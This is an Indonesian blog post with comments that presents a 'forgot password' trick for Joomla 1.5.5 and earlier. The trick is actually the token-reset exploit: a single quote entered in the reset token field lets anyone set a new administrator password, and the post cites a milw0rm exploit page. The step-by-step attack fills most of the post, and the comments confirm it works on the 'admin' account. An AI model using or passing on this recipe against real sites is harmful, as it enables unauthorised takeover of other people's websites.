“Lupa Password” Joomla Administrator

Jika kamu lupa dengan password Joomla administrator (khusus untuk versi 1.5.5 dan versi sebelumnya serta tidak termasuk versi 1.0.x) jangan khawatir, saya punya resep ampuh untuk masuk ke Joomla administrator.

Caranya :

  • [http://www.nama-domain-kamu.tld]/index.php?option=com_user&view=reset&layout=confirm.
  • Pada isian Token, masukkan karakter ‘ dan klik OK.
  • Wallaa, sekarang tinggal isi password baru Joomla administrator kamu.
  • Lalu, tinggal login di [http://www.nama-domain-kamu.tld]/administrator/ dengan password yang baru saja kamu ganti.

Gampangkan?

informasi selengkapnya ada di http://www.milw0rm.com/exploits/6234

Incoming search terms:

12 Replies to ““Lupa Password” Joomla Administrator”

  1. @unyil
    ssstttt … 😛

    @firman
    dasar JAWA KOWEK, web lu pake joomla versi berapa ? hah ? ya iyalah ga bisa dicoba diblog lu !!!

  2. mas bantuin saya dunk..aku pake jommla versi 1.0(Kalau enggak salah) soalnya baru belajar joomla hehe…
    masalahnya aku lupa sama passwordnya??tapi aku inget cuman USERNAME aja…gmn dunk!!bantuin ya Mas..
    sebelumnya Saya ucapkan terima kasih…

  3. index.php?option=com_user&view=reset&layout=confirm. . . .
    aku udah nyoba pake script yang itu tapi tetap gak bisa…

  4. Sepertinya anda salah nih…:)
    Walaupun direset seperti itu ttp tidak akan tereset klo Usernamenya bukan lagi admin…
    Itu hanya berlaku klo usernamenya “admin” Walaupun di situ tertulis password sudah direset….
    Klo g percaya coba aja..

  5. @ bojes
    kalau versi 1.0 tidak ada, ini khusus versi 1.5.5 kebawah 🙂

    @ Didox
    iya benar, hanya username admin yang bisa ter-reset

    @ thered
    upz sorry, lupa nulis 😀

  6. Manteb, gw sempat merasai joomla 2 bulan dengan segala kebingungannya, karena belum mampu, maka wordpress adalah pilihan terbaik, powerfull meski dalam hati saya masih jatuh cinta sama joomla yg lebih baik.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *